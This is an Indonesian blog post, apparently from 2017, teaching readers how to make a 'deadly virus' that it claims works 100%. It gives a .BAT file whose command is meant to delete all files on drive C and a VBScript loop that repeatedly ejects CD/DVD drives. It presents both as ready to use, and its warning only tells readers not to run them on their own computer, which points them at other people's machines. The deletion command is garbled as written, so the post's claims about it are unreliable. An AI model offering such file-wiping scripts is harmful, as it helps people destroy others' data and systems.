Senin, 23 Januari 2017

Cara Membuat Virus Mematikan yang Sangat Bekerja 100 %

Filled under:


Ketika kamu sedang bermain atau belajar dengan menggunakan komputer kamu atau laptop kamu, pernah tidak kamu menemukan sesuatu yang menganggu kamu. Ya virus, terkadang virus itu sangat menganggu di komputer kita atau laptop kita, karna virus itu dapat juga merusak komputer kamu atau laptop kamu dan dapat menghapus segala file atau dokumen penting kita di komputer.

Kira-kira kamu tahu tidak siapa ya yang menciptakan virus itu? Pasti yang terlintas dipikiran kamu itu orang yang menciptakan virus itu orang yang sangat hebat dan pintar. Dan kamu berpikir apakah kita sebagai orang biasa dapat menciptakan virus yang mematikan nggak ya? Nah disini saya akan menjawab semuanya, kalau orang biasa seperti kita itu dapat menciptakan sebuah virus yang mematikan kok!

Mau tahu? penasaran? Dengan artikel yang saya buat ini, saya akan kasih tahu kamu, mengenai cara membuat virus mematikan  yang sangat bekerja 100%, keren bukan? Nah berikut saya kasih langkah-langkahnya ya. Disimak ya!

Cara Membuat Virus Mematikan
  • Untuk langkah yang pertama kali yang kamu lakukan adalah, kamu harus melewati tahapan-tahapan berikut: Buka file notepad pada komputer kamu, dan kamu masukan kode dibawah ini@Echo offDel C: *.* |y
  • Dan kalau sudah di copy paste, kamu bisa langsung save atau simpan dengan nama yang bebas terserah kamu asalkan belakangnya ditambahkan format .BAT . Misal: wendyvirus.bat
  •  Ketika semua sudah dijalankan, maka secara otomatis drive C yang ada dikomputer kamu dan sistem nya akan terhapus semua. Oh ya dan satu lagi, sistem komputer kamu juga akan mengalami korup. Saya sarankan agar tidak mencoba pada komputer kesayangan kamu sendiri ya!
Cara Membuat Virus Mematikan CD-ROM

-          Hal pertama yang harus kamu lakukan adalah, kamu harus buka notepad pada komputer atau laptop kamu.
-          Dan kamu bisa masukan kode berikut dibawah ini:
Set oWMP = CreateObject(“WMPlayer.OCX.7”)Set colCDROMs = oWMP.cdromCollectiondoif colCDROMs.Count >= 1 thenFor i = 0 to colCDROMs.Count – 1colCDROMs.Item(i).EjectNextFor i = 0 to colCDROMs.Count – 1colCDROMs.Item(i).EjectNextEnd Ifwscript.sleep 5000loop
-          Ketika sudah dimasukan atau kamu bisa langsung copy paste kok, setelah itu kamu simpan atau save dengan nama CD-ROM.vbs
-          Coba deh kamu double klik pada file yang tadi, maka coba perhatikan CD/DVD drive akan terus ter-eject.
-          Cara untuk menghentikannya, kamu bisa buka Task Manager dan langsung kamu matikan wscipt.exe.

Gimana? Sangat mudah bukan? Semoga artikel yang saya buat ini mengenai cara membuat virus mematikan dapat bermanfaat untuk pengetahuan kamu ya. Tenang ajah virus ini sangat bekerja 100 % kok. Oh ya peringatan keras nih, saya sarankan jangan pernah mencoba dengan komputer kesayangan kamu sendiri ya, nantinya file-file dokumen kamu akan terhapus semua. Kalau kamu ada cara lain mengenai hal ini, kamu bisa langsung saja ya, bagikan pada kolom komentar dibawah ini. Terimakasih dan selamat mencoba.

Peringatan: Jangan pernah mencoba dengan komputer kesayangan kamu sendiri ya!